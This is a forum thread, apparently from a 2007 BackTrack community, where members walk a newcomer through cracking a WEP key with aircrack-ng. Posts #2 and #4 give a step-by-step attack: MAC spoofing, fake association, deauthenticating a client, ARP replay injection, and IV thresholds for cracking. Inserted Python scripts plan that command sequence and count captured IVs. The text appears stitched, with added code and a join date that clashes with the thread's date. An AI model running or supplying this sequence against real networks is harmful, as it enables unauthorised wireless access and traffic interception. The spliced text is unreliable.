Thread: 0 ARP Requests...

  #1 jason_V2 (Just burned his ISO; Join Date: May 2007; Posts: 11)

    Hey everyone,

    So I'm trying to crack my own AP following a newbie guide that someone else posted earlier. I'm trying to figure out why I can't seem to get any ARP requests...maybe someone can tell me what I'm doing wrong here. Here's what I've done so far.

    1. Fire up Kismet, find my AP "Linksys", press ENTER to get the BSSID
    2. Go back to the main screen of Kismet, press "C" to see connected clients, grab one of the MAC addresses
    3. Store the BSSID in a variable (export AP=00:11:22:33:44:55)
    4. Store the Client MAC in a variable (export MAC=66:77:88:99:00:11)
    5. Fire up airodump using the following command
    airodump-ng -w capture -c 6 -a $AP ath1
    6. Start another Konsole screen, store the variables again, and get the DeAuth attack ready using the following command:
    aireplay-ng -e Linksys -a $AP -c $MAC --deauth 10 ath1
    7. Start another Konsole screen, store the variables again, execute the following command:
    aireplay-ng --arpreplay -b $AP -h $MAC ath1
    *I get something that says "The interface MAC (some MAC) doesn't match the specified MAC (-h)."

    Finally, I execute the previous DeAuth command.

    The Konsole reading the packets gives notices that read "Notice: got a deauth/disassoc packet. Is the source MAC associated?". It goes right on reading the packets. It's been a little over half an hour to 45 minutes and about 60k packets have been read but still 0 ARP requests.

    Any ideas? Thanks!!

  #2 Xploitz (Senior Member; Join Date: Apr 2007; Posts: 3,385)


    Quote Originally Posted by jason_V2:
    Hey everyone,

    maybe someone can tell me what I'm doing wrong here. Here's what I've done so far.

    5. Fire up airodump using the following command
    airodump-ng -w capture -c 6 -a $AP ath1

    Try this instead:

    When you use airodump, use airodump-ng -w capture -c 6 --bssid $AP ath1 (instead of the -a option, use --bssid; that should work).



    Quote Originally Posted by jason_V2:
    *I get something that says "The interface MAC (some MAC) doesn't match the specified MAC (-h)."

    You're not associated, and you need to run the following in THIS EXACT ORDER:

    1. ifconfig ath1 down

    2. macchanger --mac 00:11:22:33:44:55 ath1

    3. *****then here you can run both your export scripts*****

    4. airmon-ng start ath1 6 (to set the card in monitor mode on channel 6)

    5. aireplay-ng -1 0 -e Linksys -a $AP -h $MAC ath1 (to associate)

    6. airodump-ng -c 6 -w capture --bssid $AP ath1 (instead of your -a, use --bssid)

    7. aireplay-ng -e Linksys -a $AP -c $MAC --deauth 10 ath1 (now here in the -c field, if you use $MAC it will not put the associated client's MAC here; it will put the fake MAC address instead, 00:11:22:33:44:55, so I suggest you Ctrl+C the airodump screen to stop it and copy/paste the real associated client's address here, OK?)

    8. aireplay-ng --arpreplay -b $AP -h $MAC ath1





    Quote Originally Posted by jason_V2:
    Finally, I execute the previous DeAuth command.

    The Konsole reading the packets gives notices that read "Notice: got a deauth/disassoc packet. Is the source MAC associated?". It goes right on reading the packets. It's been a little over half an hour to 45 minutes and about 60k packets have been read but still 0 ARP requests.

    Again, you're not associated correctly. Redo:
    aireplay-ng -1 0 -e Linksys -a $AP -h $MAC ath1 (to associate), and if you get errors, check to make sure all MACs are set up right.

    Did this help??? Hope so. I'm still a LITTLE wet behind the ears, but I'm trying to help as much as I can because of all the help I got when I first started out a month ago.

    Good luck and let me know how and if this helped you.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]
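The sequence in the post above fails for one reason more often than any other: the value handed to aireplay-ng's -h is not the MAC the card is actually using, which is exactly the "interface MAC ... doesn't match the specified MAC (-h)" message from the first post. The script below is an added example for this thread (not aircrack-ng code and not from any post here): it reads the card's current MAC from sysfs, checks it against the exported variables (including the -c gotcha from step 7, where $MAC must not be reused for the deauth target), and only then prints the post's command sequence in order. The interface name, ESSID, BSSID and MACs are the thread's placeholders; the factory MAC and the sysfs tree in the demo are constructed, and the sysfs root is a parameter so the check runs on a box with no wireless card.

```python
"""Pre-flight check for the client-based WEP ARP-replay sequence in post #2.

Added example for this thread, not part of aircrack-ng or of any post above.
aireplay-ng refuses to inject when -h differs from the interface's current
MAC; this reads that MAC from sysfs (standard Linux path, overridable),
checks it against the exported variables, then prints post #2's commands.
"""
import os
import re
import shlex
import tempfile

MAC_RE = re.compile(r"^[0-9a-f]{2}([:-][0-9a-f]{2}){5}$", re.I)


def normalize_mac(value: str) -> str:
    """Accept aa:bb:.. or AA-BB-.. and return lower-case colon form; reject anything else."""
    value = value.strip()
    if not MAC_RE.match(value):
        raise ValueError(f"not a MAC address: {value!r}")
    return value.lower().replace("-", ":")


def read_iface_mac(iface: str, sysfs_root: str = "/sys/class/net") -> str:
    """Hardware address the kernel currently reports; this is what aireplay-ng compares -h with."""
    with open(os.path.join(sysfs_root, iface, "address")) as fh:
        return normalize_mac(fh.read())


def check_macs(iface_mac: str, inject_mac: str, client_mac: str, bssid: str) -> list:
    """Problems to fix before injecting. An empty list means the MACs are consistent."""
    iface_mac, inject_mac = normalize_mac(iface_mac), normalize_mac(inject_mac)
    client_mac, bssid = normalize_mac(client_mac), normalize_mac(bssid)
    problems = []
    if inject_mac != iface_mac:
        problems.append(
            f"-h {inject_mac} is not the interface MAC {iface_mac}: bring the interface "
            f"down and run 'macchanger --mac {inject_mac} <iface>', or use -h {iface_mac}")
    if client_mac == inject_mac:
        problems.append(
            "deauth -c must be the real associated station (copy it from airodump-ng), "
            "not the MAC you inject with")
    if bssid in (client_mac, inject_mac):
        problems.append("BSSID must be the AP's address, not a station address")
    return problems


def plan_commands(iface, essid, bssid, inject_mac, client_mac, channel) -> list:
    """Post #2's sequence, shell-quoted: spoof, monitor, associate, dump, deauth, replay."""
    bssid, inject_mac, client_mac = (normalize_mac(m) for m in (bssid, inject_mac, client_mac))
    steps = [
        ["ifconfig", iface, "down"],
        ["macchanger", "--mac", inject_mac, iface],
        ["airmon-ng", "start", iface, str(channel)],
        ["aireplay-ng", "-1", "0", "-e", essid, "-a", bssid, "-h", inject_mac, iface],
        ["airodump-ng", "-c", str(channel), "-w", "capture", "--bssid", bssid, iface],
        ["aireplay-ng", "-0", "10", "-a", bssid, "-c", client_mac, iface],
        ["aireplay-ng", "-3", "-b", bssid, "-h", inject_mac, iface],
    ]
    return [shlex.join(step) for step in steps]


def demo_with_fake_sysfs() -> list:
    """Reproduce the thread's failure offline: the card still has its factory MAC,
    but $MAC (used for -h) was set to the associated client's address."""
    with tempfile.TemporaryDirectory() as root:   # constructed stand-in for /sys/class/net
        os.makedirs(os.path.join(root, "ath1"))
        with open(os.path.join(root, "ath1", "address"), "w") as fh:
            fh.write("00:0f:b5:aa:bb:cc\n")         # constructed factory MAC
        iface_mac = read_iface_mac("ath1", sysfs_root=root)
    return check_macs(iface_mac, inject_mac="66:77:88:99:00:11",
                      client_mac="66:77:88:99:00:11", bssid="00:11:22:33:44:55")


if __name__ == "__main__":
    for problem in demo_with_fake_sysfs():
        print("FIX:", problem)
    print("\n".join(plan_commands("ath1", "Linksys", "00:11:22:33:44:55",
                                  "00:0f:b5:aa:bb:cc", "66:77:88:99:00:11", 6)))
```

Run it as-is to see both problems from the thread reported against the constructed sysfs tree; on a real BackTrack box replace the demo with `read_iface_mac("ath1")` and your own exported values. Note that the planner deliberately takes the injection MAC and the deauth target as two separate arguments, which is the distinction step 7 above is making.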

  #3 jason_V2 (Just burned his ISO; Join Date: May 2007; Posts: 11)


    Thank you! That helped...

    It seems like Aircrack is kinda slow at picking up IVs. It took about 30 minutes to gather 22,000. How many packets does it generally need to crack a 64-bit WEP key?

  #4 Xploitz (Senior Member; Join Date: Apr 2007; Posts: 3,385)


    Quote Originally Posted by jason_V2:
    Thank you! That helped...

    It seems like Aircrack is kinda slow at picking up IVs. It took about 30 minutes to gather 22,000. How many packets does it generally need to crack a 64-bit WEP key?

    If you're doing an arpreplay (the -3 option), you're waiting on the router (doing no-client WEP) to generate an ARP request. That could take a few minutes. I've waited 15 minutes on my router, and at other times it happens relatively fast. It just depends on your timing from when you do the arpreplay attack and when your router spits out the ARP. If you want to speed it up a little bit, you can do a frag attack (-5) or a chopchop attack. Or you can go to your wired PC that's on the network and ping a nonexistent IP; that will surely generate a quick ARP request!!

    BTW, it depends on whether you're using aircrack-ng or aircrack-ptw.

    For aircrack-ng (taken from the aircrack main site):

    Generally, don’t try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques. Start by trying 64 bit keys “aircrack-ng -n 64 captured-data.cap”. If they are using a 64 bit WEP, it can usually be cracked in less than 5 minutes (generally less than 60 seconds) with relatively few IVs. It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: “aircrack-ng captured-data.cap”. Then at every 100,000 IVs mark, retry the “aircrack-ng -n 64 captured-data.cap” for 5 minutes.

    Once you hit 600,000 IVs, switch to testing 128 bit keys. It would be unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try “aircrack-ng captured-data.cap”.

    Once you hit 2 million IVs, try changing the fudge factor to “-f 4”. Run for at least 30 minutes to one hour. Retry with increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.

    All the while, keep collecting data. Remember the golden rule, “the more IVs the better”.

    Also check out the next section on how to determine which options to use. These can also speed up cracking the WEP key. For example, if the key is all numeric, then it can take as few as 50,000 IVs to crack a 64 bit key with the “-t” versus 200,000 IVs without the “-t”. So if you have a hunch about the nature of the WEP key, it is worth trying a few variations.




    For aircrack-ptw .....The successful aircrack-ptw crack took approximately 50,000 data packets, however, the number of data packets required will obviously vary.

    It took less than 2 minutes to capture the 50,000 data packets and obtain the WEP key: 866578388517be0b4818a0db1

    This scenario was conducted in a lab environment under ideal conditions, expect the process to take a little longer in reality.

    *******LINKS FOR AIRCRACK-PTW*******

    http://wirelessdefence.org/Contents/Aircrack-ptw.htm
    http://www.cdc.informatik.tu-darmsta...crack-ptw/#top


    Hope that helped you as well jason_V2
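The post above throws around two counters, the unique-IV count that airodump-ng shows and the "ARP requests" count that aireplay-ng shows, without saying what they are made of. The parser below is an added example for this thread, not aircrack-ng code and not from any post here: it walks a raw 802.11 pcap (linktype 105, no radiotap), picks out WEP-protected data frames, extracts the 3-byte IV from each, and counts unique IVs per BSSID, which is why a replayed ARP frame adds no IV while each AP response does. It also counts frames sized like an encrypted ARP request; that size rule (44-byte body: IV/key ID 4 + LLC/SNAP 8 + ARP 28 + ICV 4) is this example's own heuristic, the same idea aireplay-ng uses but not its exact filter. The capture at the bottom is constructed inline so the script runs offline.

```python
"""Count unique WEP IVs and ARP-sized frames per BSSID in a raw 802.11 pcap.

Added example for this thread (not aircrack-ng code). The capture it builds is
constructed; the ARP size rule is this example's assumption.
"""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105        # raw 802.11 frames without a radiotap header
FC_TYPE_DATA = 0x08              # frame control byte 0: type bits = 2 (data)
FC_SUBTYPE_NULL = 0x40           # subtype bit 2: "null" data frames carry no body
FC_SUBTYPE_QOS = 0x80            # subtype bit 3: QoS data, header is 26 bytes not 24
FLAG_TODS, FLAG_FROMDS, FLAG_PROTECTED = 0x01, 0x02, 0x40
KEYID_EXTIV = 0x20               # set in the key-ID byte by TKIP/CCMP, never by WEP
# WEP-encrypted ARP body (non-QoS): IV+keyID 4, LLC/SNAP 8, ARP 28, ICV 4 (assumption)
ARP_WEP_BODY_LEN = 4 + 8 + 28 + 4


def iter_pcap(blob: bytes):
    """Yield each frame from a classic pcap blob (either byte order, linktype 105)."""
    magic, = struct.unpack_from("<I", blob, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", blob, 20)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"need linktype 105 (raw 802.11), got {linktype}")
    off = 24
    while off + 16 <= len(blob):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", blob, off)
        off += 16
        yield blob[off:off + incl_len]
        off += incl_len


def parse_wep_data_frame(frame: bytes):
    """(bssid, iv, body_len) for a WEP-protected 802.11 data frame, else None."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if fc0 & 0x0C != FC_TYPE_DATA or fc0 & FC_SUBTYPE_NULL or not fc1 & FLAG_PROTECTED:
        return None
    ds = fc1 & (FLAG_TODS | FLAG_FROMDS)         # address layout depends on the DS bits
    if ds == 0:
        bssid = frame[16:22]                    # IBSS: addr3
    elif ds == FLAG_TODS:
        bssid = frame[4:10]                     # station -> AP: addr1
    elif ds == FLAG_FROMDS:
        bssid = frame[10:16]                    # AP -> station: addr2
    else:
        return None                             # 4-address WDS frame: out of scope
    body = frame[26 if fc0 & FC_SUBTYPE_QOS else 24:]
    if len(body) < 4 + 4 or body[3] & KEYID_EXTIV:   # too short, or TKIP/CCMP not WEP
        return None
    return ":".join(f"{b:02x}" for b in bssid), bytes(body[:3]), len(body)


def count_ivs(pcap_blob: bytes) -> dict:
    """Per BSSID: data frames seen, unique IVs, and frames sized like encrypted ARP."""
    stats = defaultdict(lambda: {"data_frames": 0, "ivs": set(), "arp_like": 0})
    for frame in iter_pcap(pcap_blob):
        parsed = parse_wep_data_frame(frame)
        if parsed is None:
            continue
        bssid, iv, body_len = parsed
        stats[bssid]["data_frames"] += 1
        stats[bssid]["ivs"].add(iv)              # a replayed frame reuses its IV
        stats[bssid]["arp_like"] += body_len == ARP_WEP_BODY_LEN
    return {b: {"data_frames": s["data_frames"], "unique_ivs": len(s["ivs"]),
                "arp_like": s["arp_like"]} for b, s in stats.items()}


def wep_frame(bssid, src, dst, iv, payload_len, to_ds=True, keyid=0x00) -> bytes:
    """Constructed WEP data frame; ciphertext and ICV are filler, only sizes matter."""
    flags = FLAG_PROTECTED | (FLAG_TODS if to_ds else FLAG_FROMDS)
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    header = bytes([FC_TYPE_DATA, flags, 0, 0]) + a1 + a2 + a3 + b"\x00\x00"
    return header + iv + bytes([keyid]) + b"\xaa" * payload_len + b"\x00" * 4


def build_sample_pcap() -> bytes:
    """Constructed capture of the thread's scenario: one AP, one client, eight frames."""
    ap, client, bcast = bytes.fromhex("001122334455"), bytes.fromhex("667788990011"), b"\xff" * 6
    frames = [
        wep_frame(ap, client, bcast, b"\x01\x02\x03", 36),          # client's ARP request
        wep_frame(ap, client, bcast, b"\x01\x02\x03", 36),          # same frame replayed
        wep_frame(ap, client, bcast, b"\x0a\x0b\x0c", 36, False),   # AP rebroadcasts, new IV
        wep_frame(ap, ap, client, b"\x0a\x0b\x0d", 120, False),     # ordinary data, new IV
        wep_frame(ap, ap, client, b"\x0a\x0b\x0e", 300, False),
        wep_frame(ap, ap, client, b"\x0a\x0b\x0f", 58, False),
        wep_frame(ap, client, ap, b"\x11\x22\x33", 36, keyid=KEYID_EXTIV),  # WPA: skipped
        bytes([0x80, 0, 0, 0]) + bcast + ap + ap + b"\x00\x00" + b"\x00" * 12,  # beacon
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_180_000_000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for bssid, s in count_ivs(build_sample_pcap()).items():
        print(f"{bssid}: {s['data_frames']} data frames, {s['unique_ivs']} unique IVs, "
              f"{s['arp_like']} ARP-sized")
```

Point it at the capture-01.cap that airodump-ng writes (a plain -w capture, not --ivs) to see how many distinct IVs you really have against the 200,000 / 600,000 thresholds quoted above; on the constructed sample the two replayed copies of the ARP request contribute one IV between them, which is why the replay attack only pays off once the AP starts answering.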

  #5 shamanvirtuel (Senior Member; Join Date: Mar 2010; Location: Somewhere in the "Ex" human right country; Posts: 2,988)


    For aircrack-ptw, download my precompiled module; easier than compiling, no?

    http://ovh.dl.sourceforge.net/source..._ptw_1_0_0.lzm

    Hope it helps.
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  #6 Xploitz (Senior Member; Join Date: Apr 2007; Posts: 3,385)


    Quote Originally Posted by shamanvirtuel:
    For aircrack-ptw, download my precompiled module; easier than compiling, no?

    http://ovh.dl.sourceforge.net/source..._ptw_1_0_0.lzm

    Hope it helps.

    Yes, it is easier!!!! Sorry shamanvirtuel, I had forgotten you had already precompiled it.

  #7 shamanvirtuel (Senior Member; Join Date: Mar 2010; Location: Somewhere in the "Ex" human right country; Posts: 2,988)


    Yes, it's really useful to have it precompiled, because many compilation attempts fail... I heard.

    I also precompiled ntfs-3g, yakuake, GDHPD and a bundle GSLAPT-slapt-get....
    More will come...

  #8 Xploitz (Senior Member; Join Date: Apr 2007; Posts: 3,385)


    Quote Originally Posted by shamanvirtuel:
    Yes, it's really useful to have it precompiled, because many compilation attempts fail... I heard.

    I also precompiled ntfs-3g, yakuake, GDHPD and a bundle GSLAPT-slapt-get....
    More will come...

    You did yakuake as well?? Got a link to it?? I didn't see it when I searched the above posted link.

    ****EDIT**** heres the link for anyone who wants it..

    http://ovh.dl.sourceforge.net/source...uake_2_7_5.lzm

  #9 jason_V2 (Just burned his ISO; Join Date: May 2007; Posts: 11)


    You guys are awesome. Thanks so much! I'm on my way to *hopefully* getting out of this Linux n00b phase....

  #10 Xploitz (Senior Member; Join Date: Apr 2007; Posts: 3,385)


    Quote Originally Posted by jason_V2:
    You guys are awesome. Thanks so much! I'm on my way to *hopefully* getting out of this Linux n00b phase....

    Hell, I'm still in the n00b phase!!!... lol. I mastered XP Pro, and I've only been playing with Linux for a month or a little less. It's very overwhelming at first, but much like Windows, I'll master Linux soon enough; it's all just a learning phase.

    Glad we could help you jason_V2
